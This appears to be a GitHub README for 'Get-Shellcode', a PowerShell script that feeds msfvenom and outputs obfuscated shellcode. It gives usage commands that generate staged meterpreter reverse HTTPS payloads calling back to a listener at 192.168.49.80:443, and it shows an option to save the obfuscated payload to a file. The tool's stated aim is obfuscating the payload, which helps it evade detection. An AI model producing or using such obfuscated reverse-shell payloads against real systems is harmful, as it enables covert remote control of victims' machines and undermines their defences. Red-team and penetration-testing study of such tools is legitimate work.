A solution to create obfuscated shellcode from msfvenom for PowerShell.

gh0x0st/Get-Shellcode

Obfuscated Msfvenom Shellcode for PowerShell

Get-Shellcode is a project that stems from the Invoke-PSObfuscation framework, with the sole purpose of producing obfuscated shellcode generated from msfvenom for PowerShell payloads.

Requirements

This script was built and tested on the following versions of Kali Linux and PowerShell. The resulting payload is compatible with systems that support PowerShell newer than version 2.0. The script also relies on msfvenom being accessible on the system, which is available by default on Kali.

┌──(kali㉿kali)-[/home/kali]
└─PS> $PSVersionTable

Name                           Value
----                           -----
PSVersion                      7.2.4
PSEdition                      Core
GitCommitId                    7.2.4
OS                             Linux 5.18.0-kali5-amd64 #1 SMP PREEMPT_DYNAMIC Debian 5.18.5-1kali6 (2022-07-07)
Platform                       Unix
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0…}
PSRemotingProtocolVersion      2.3
SerializationVersion           1.1.0.1
WSManStackVersion              3.0

Usage Examples

To load the script on Kali Linux, open a terminal and run pwsh. With PowerShell running in your terminal, load the script into your current session by dot-sourcing it.

┌──(kali㉿kali)-[~]
└─$ pwsh
PowerShell 7.2.4
Copyright (c) Microsoft Corporation.

https://aka.ms/powershell
Type 'help' to get help.

┌──(kali㉿kali)-[/home/kali]
└─PS> . ./Get-Shellcode.ps1

With the script loaded into our PowerShell session, we run the Get-Shellcode function to generate our payload. A payload can be generated in two ways: the default payload or a supplied payload.

Default Payload

The default payload generated by this script is staged meterpreter reverse HTTPS shellcode, which only requires us to pass an IP address and port. This default payload also sets EXITFUNC to thread. This default is merely a personal preference and can easily be changed.

Get-Shellcode -Ip 192.168.49.80 -Port 443

Supplied Payload

The second option is the supplied payload, where we pass our own parameters to msfvenom. Keep in mind that this solution is designed for PowerShell payloads, so you must include -f ps1. Staged payloads are significantly smaller than stageless payloads, so stageless payloads take longer to process. If you pass a custom payload variable name, it is obfuscated as well.

Get-Shellcode -Msfvenom "-p windows/x64/meterpreter/reverse_https LHOST=192.168.49.80 LPORT=443 EXITFUNC=thread -f ps1"

Output to File

Get-Shellcode -Msfvenom "-p windows/x64/meterpreter/reverse_https LHOST=192.168.49.80 LPORT=443 EXITFUNC=thread -f ps1" -OutFile obfuscated.ps1
